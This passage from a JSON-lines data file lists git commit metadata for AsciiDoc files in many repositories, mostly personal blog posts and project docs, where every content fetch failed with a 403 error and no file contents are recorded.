'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd5f08b5ff5a732c9f63799e2ccda0c57ab43a0e","subject":"Update 2016-01-27-test2.adoc","message":"Update 2016-01-27-test2.adoc","repos":"inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io","old_file":"_posts\/2016-01-27-test2.adoc","new_file":"_posts\/2016-01-27-test2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inedit-reporter\/inedit-reporter.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6dced81fde7db9f0e93d6217300aa65ecfcfa1a","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7be8cfda5930ec2f4c828dde89b46f9d8692de52","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d9ebe80a5ecb97e19d20706397bd7aeb3212d5f","subject":"Update 2017-3-31-scrapy.adoc","message":"Update 2017-3-31-scrapy.adoc","repos":"chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io","old_file":"_posts\/2017-3-31-scrapy.adoc","new_file":"_posts\/2017-3-31-scrapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chaseey\/chaseey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c80011080e29a36fe19576f670270496c872f11","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae7c2a331f0b7316d89721c0c7a6c28d243f362d","subject":"Update 2016-04-30-Example.adoc","message":"Update 2016-04-30-Example.adoc","repos":"kay\/kay.github.io,kay\/kay.github.io,kay\/kay.github.io,kay\/kay.github.io","old_file":"_posts\/2016-04-30-Example.adoc","new_file":"_posts\/2016-04-30-Example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kay\/kay.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cc225532449aa0f250443bb4821b9804f30b0c5","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20fd91a4301a68e1bffe13140bed9c260d60db90","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d36932fb08b3d754c018a22208adca06754849fb","subject":"Update 2017-02-01-Hello.adoc","message":"Update 2017-02-01-Hello.adoc","repos":"introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io","old_file":"_posts\/2017-02-01-Hello.adoc","new_file":"_posts\/2017-02-01-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/introspectively\/introspectively.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a180f130e922c5e2c29f1bd645b88b19b083b78","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d4da9874565772968c41342d828aeac91b099ab","subject":"#420 initial version of Quick Guide","message":"#420 initial version of Quick Guide\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/quick-guide.adoc","new_file":"docs\/quick-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"366257ce6696daabbd6368bccc4a948ad5368165","subject":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017.adoc'","message":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"299ddc6fd1b9384c35b66be8cb9c062c275ae413","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c058502f40b11d5266c2f5ce4509ef23cf3a0e0","subject":"Update 2016-01-23-Giving-up-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94b1d6fe9ecc222580d404314799fb8b87a90c9e","subject":"Create technoedge.adoc","message":"Create technoedge.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"technoedge.adoc","new_file":"technoedge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"36bff3d7212c079d4699ec584abc7bdb9d3c98d7","subject":"CAMEL-12665 - Added autogenerated docs","message":"CAMEL-12665 - Added autogenerated docs\n","repos":"adessaigne\/camel,CodeSmell\/camel,CodeSmell\/camel,ullgren\/camel,pmoerenhout\/camel,gnodet\/camel,zregvart\/camel,pmoerenhout\/camel,zregvart\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,adessaigne\/camel,davidkarlsen\/camel,DariusX\/camel,davidkarlsen\/camel,ullgren\/camel,mcollovati\/camel,mcollovati\/camel,DariusX\/camel,nicolaferraro\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,christophd\/camel,ullgren\/camel,cunningt\/camel,alvinkwekel\/camel,tdiesler\/camel,tdiesler\/camel,davidkarlsen\/camel,mcollovati\/camel,zregvart\/camel,tdiesler\/camel,adessaigne\/camel,Fabryprog\/camel,pax95\/camel,objectiser\/camel,christophd\/camel,nicolaferraro\/camel,christophd\/camel,nikhilvibhav\/camel,zregvart\/camel,apache\/camel,tadayosi\/camel,alvinkwekel\/camel,tadayosi\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,nicolaferraro\/camel,adessaigne\/camel,mcollovati\/camel,nikhilvibhav\/camel,apache\/camel,gnodet\/camel,tadayosi\/camel,pmoerenhout\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,objectiser\/camel,ullgren\/camel,DariusX\/camel,pmoerenhout\/camel,Fabryprog\/camel,pmoerenhout\/camel,nicolaferraro\/camel,objectiser\/camel,objectiser\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,christophd\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,gnodet\/camel,davidkarlsen\/camel,Fabryprog\/camel,tdiesler\/camel,Fabryprog\/camel,pax95\/camel,pax95\/camel,nikhilvibhav\/camel,apache\/camel,apache\/camel,CodeSmell\/camel","old_file":"components\/camel-pulsar\/src\/main\/docs\/pulsar-component.adoc","new_file":"components\/camel-pulsar\/src\/main\/docs\/pulsar-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21f7f3d05a618531d014faffcaca20bf6633136","subject":"update programme","message":"update programme\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fb6f400e18bcac191884b2b8f239d5fad4b4c46","subject":"Update 2016-06-01-Testing-chef-changes-the-dirty-way.adoc","message":"Update 2016-06-01-Testing-chef-changes-the-dirty-way.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-06-01-Testing-chef-changes-the-dirty-way.adoc","new_file":"_posts\/2016-06-01-Testing-chef-changes-the-dirty-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ec95ec8d85872ad830a1a64e34303702f6f0c0c","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb4af33f9655e01bb2a7faa0c0fcfaa345330005","subject":"Update 2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","message":"Update 2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","new_file":"_posts\/2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65eb59a2df86d27270bfcf6fdfc7996e7f78f69f","subject":"Dymmy root commit","message":"Dymmy root commit\n","repos":"tmikov\/linebench,tmikov\/linebench,tmikov\/linebench,tmikov\/linebench,tmikov\/linebench","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmikov\/linebench.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"6fb4a7433cefd53e34aee10afa562952d6ecf2e0","subject":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a207120b324723a94bd1d2c7f23124a423155e7b","subject":"Update 2017-07-21-Learning-to-reconstruct.adoc","message":"Update 2017-07-21-Learning-to-reconstruct.adoc","repos":"adler-j\/adler-j.github.io,adler-j\/adler-j.github.io","old_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adler-j\/adler-j.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5eec54eac4c8faec5c39117c32853c4e080fbfba","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f2405988785856ff973aa0989a9b778820b9f5","subject":"Renamed '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","message":"Renamed '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_file":"_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7141c1ffa594e8d28fcc1970e118b846088efa4f","subject":"Add documentation about which functions are usually executed in forked child","message":"Add documentation about which functions are usually executed in forked child\n","repos":"thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"af3bcdb82137eb44d7a99b31bf75a3c4d897b87b","subject":"Initial commit","message":"Initial commit\n","repos":"dadoonet\/elasticsearch-parent,rmuir\/elasticsearch-parent,elastic\/elasticsearch-parent","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuir\/elasticsearch-parent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8553d57716232ef79405abd4869b7c5003285e0b","subject":"Added documentation regarding using the prebuilt Docker image","message":"Added documentation regarding using the prebuilt Docker image\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27124ddd1d2190572275c3a52af1774b59892c34","subject":"Create symbolic link for asciidoc index (#1841)","message":"Create symbolic link for asciidoc index (#1841)\n\n","repos":"GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f711377598081f2d039f4c51d994a9f26c3f976a","subject":"Update 2015-10-10-Jug-Summer-Camp-2015.adoc","message":"Update 2015-10-10-Jug-Summer-Camp-2015.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-10-10-Jug-Summer-Camp-2015.adoc","new_file":"_posts\/2015-10-10-Jug-Summer-Camp-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1cbb7ad4c33c3d2aa3f5f6ab8a6c1f6c8fd7ec1","subject":"Update 2016-04-04-Chairpersons-Chinwag.adoc","message":"Update 2016-04-04-Chairpersons-Chinwag.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e6f93ab2606426bce9fa492e4af5b71815d1ba","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22ff4042a022d56911dafb77bcba761221170cc0","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"295c6c77d781a71082e7afe320187da982e5751e","subject":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","message":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bcc2fbd598ab46e9673214433b8723e4a1cb663","subject":"Update 2017-02-14-Osram-Lightify-Gateway.adoc","message":"Update 2017-02-14-Osram-Lightify-Gateway.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Osram-Lightify-Gateway.adoc","new_file":"_posts\/2017-02-14-Osram-Lightify-Gateway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6995444e614fe0fce3da1f824056bb9c7feb51c","subject":"Update 2017-10-12-start-chrome-extension.adoc","message":"Update 2017-10-12-start-chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74e10057f09c1b3893d7d37c2b4f8b4c765f73c4","subject":"Update README","message":"Update README\n","repos":"pjanouch\/autistdraw","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/autistdraw.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"c648a9eda302671913fc1f05cc68029a5b1d9ef6","subject":"Add `note grep` example to README.adoc","message":"Add `note grep` example to README.adoc\n","repos":"rumpelsepp\/pynote","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4edff1285505a7122460bc1f912cee169373fbdd","subject":"Update 2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","message":"Update 2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","new_file":"_posts\/2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9810bf20c57a3e806347575e49ffa445a1a0b0d","subject":"last commit before referencing","message":"last commit before referencing\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ba3dffc8b78fadfa8523e7cb4a48981fea02d6e","subject":"y2b create post PICK YOUR PRIZE GIVEAWAY!","message":"y2b create post PICK YOUR PRIZE GIVEAWAY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-16-PICK-YOUR-PRIZE-GIVEAWAY.adoc","new_file":"_posts\/2012-08-16-PICK-YOUR-PRIZE-GIVEAWAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76eda1b3c444179a5d3094795100b3dc37085db1","subject":"Concept","message":"Concept\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Concept.adoc","new_file":"docs\/Concept.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"ede0edd2149dfb4bfee708439c9d331918f02981","subject":"Update 2017-09-08-OP-Installer-Merging.adoc","message":"Update 2017-09-08-OP-Installer-Merging.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-08-OP-Installer-Merging.adoc","new_file":"_posts\/2017-09-08-OP-Installer-Merging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df131dce5809e20f1aa28d7267e735e951cd5b0f","subject":":memo: cdn vue","message":":memo: cdn vue\n","repos":"syon\/refills","old_file":"src\/refills\/vuejs\/vue-cdn.adoc","new_file":"src\/refills\/vuejs\/vue-cdn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31635a9a802adc248388704ce25e9abbb21b5c2","subject":"doc: update astf manual","message":"doc: update astf manual\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_astf.asciidoc","new_file":"doc\/trex_astf.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e04ea1f71255ebb5c41d63bef69c8704b5e7bbb","subject":"Update 2012-11-09-google-cloud-endpoints.adoc","message":"Update 